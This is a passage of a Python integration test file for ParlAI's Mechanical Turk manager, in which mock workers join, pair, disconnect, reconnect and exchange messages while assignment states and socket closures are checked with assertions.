connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up an agent to disconnect when paired
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
message_handler_3 = make_packet_handler_cant_task(
test_agent_3,
dummy,
dummy,
msg_callback_3
)
test_agent_3.always_beat = True
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
# Start heartbeats for 3
test_agent_3.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not entered into pool'
# create and set up an agent to disconnect when returned to waiting
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal message_num
nonlocal test_agent_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_4.wants_to_send = True
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_4, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats for 4
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when assigned to a world'
check_status(assign_state_3.status, AssignState.STATUS_ASSIGNED)
# Wait for the world to give up on waiting
wait_for_state_time(WORLD_START_TIMEOUT + 2.5, mturk_manager)
# Assert that the agent is back in the waiting world
check_status(assign_state_4.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not entered returned to pool'
# Assert that the disconnected agent is marked as so
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_DISCONNECT)
# Wait for 4 to disconnect as well
test_agent_4.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when disconnected'
check_status(assign_state_4.status, AssignState.STATUS_DISCONNECT)
# create and set up the first successful agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_4), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_NO_ONBOARDING_TEST] = True
def test_duo_valid_reconnects(opt, server_url):
"""Tests reconnects during the task which should reload the conversation
state, as well as completing a task after a reconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_VALID_RECONNECT_TEST))
opt['task'] = DUO_VALID_RECONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_VALID_RECONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
refresh_was_valid = False
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Simulate a refresh, msg callback will verify it was valid
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(4, mturk_manager)
assert refresh_was_valid, 'Information sent on refresh was invalid'
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_VALID_RECONNECT_TEST] = True
def test_duo_one_disconnect(opt, server_url):
"""Tests whether disconnects properly cause a task to fail and let the
non-disconnecting partner complete the HIT. Also tests reconnecting after
a partner disconnect or after a disconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_ONE_DISCONNECT_TEST))
opt['task'] = DUO_ONE_DISCONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONE_DISCONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
partner_disconnects = 0
self_disconnects = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
MTURK_DISCONNECT_MESSAGE
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_1.conversation_id is not None and \
test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_2.conversation_id is not None and \
test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2.5, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2.5, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
mturk_first_agent = None
mturk_second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
mturk_first_agent = mturk_manager_assign_1
mturk_second_agent = mturk_manager_assign_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
mturk_second_agent = mturk_manager_assign_1
mturk_first_agent = mturk_manager_assign_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
# Disconnect the first agent
first_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert partner_disconnects == 1, \
'Connected agent did not recieve an inactive_done command'
# Refresh the second agent
second_agent.conversation_id = None
second_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert partner_disconnects == 2, \
'Reconnected agent did not recieve an inactive_done command'
# Refresh the first agent
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert self_disconnects == 1, \
'Disconnected agent did not recieve an inactive command'
# Disconnect the second agent
second_agent.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(mturk_second_agent.state.status,
AssignState.STATUS_PARTNER_DISCONNECT)
check_status(mturk_first_agent.state.status,
AssignState.STATUS_DISCONNECT)
assert mturk_manager.completed_conversations == 0, \
'Incomplete conversation marked as complete'
assert mturk_second_agent.disconnected is False, \
'MTurk manager improperly marked the connected agent as disconnected'
assert mturk_first_agent.disconnected is True, \
'MTurk did not mark the disconnected agent as so'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
completed_threads[DUO_ONE_DISCONNECT_TEST] = True
def test_count_complete(opt, server_url):
"""Starts two worlds even though only one is requested by using the
count_complete flag.
"""
global completed_threads
print('{} Starting'.format(COUNT_COMPLETE_TEST))
opt['task'] = COUNT_COMPLETE_TEST
opt['count_complete'] = True
opt['num_conversations'] = 1
hit_id = FAKE_HIT_ID.format(COUNT_COMPLETE_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 2)
last_command = None
message_num_1 = 0
message_num_2 = 0
expected_messages = [TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback_1(packet):
nonlocal last_command
nonlocal message_num_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_1], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_1],
message_num_1,
packet.data['text']
)
message_num_1 += 1
test_agent_1 = \
MockAgent(opt, hit_id, assign_id_1, worker_id_1, task_group_id)
message_handler = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Run through onboarding
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_1.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
# Start the second agent while the first is still waiting
def msg_callback_2(packet):
nonlocal last_command
nonlocal message_num_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_2], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_2],
message_num_2,
packet.data['text']
)
message_num_2 += 1
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id_2, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Run through onboarding
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
# Finish agent 1's task
test_agent_1.send_message('Hello2', dummy)
test_agent_1.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
# Wait for both to disconnect
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert len(assign_state_1.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert len(assign_state_2.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager.started_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert mturk_manager.completed_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert message_num_1 == 2, 'Not all messages were successfully processed'
assert message_num_2 == 2, 'Not all messages were successfully processed'
completed_threads[COUNT_COMPLETE_TEST] = True
pass
def test_expire_hit(opt, server_url):
"""Tests force_expire_hit by creating 4 workers, leaving
one in onboarding and sending 3 to waiting, then ensuring that the
remaining waiting worker gets expired"""
global completed_threads
print('{} Starting'.format(EXPIRE_HIT_TEST))
opt['task'] = EXPIRE_HIT_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(EXPIRE_HIT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
last_command_3 = None
last_command_4 = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
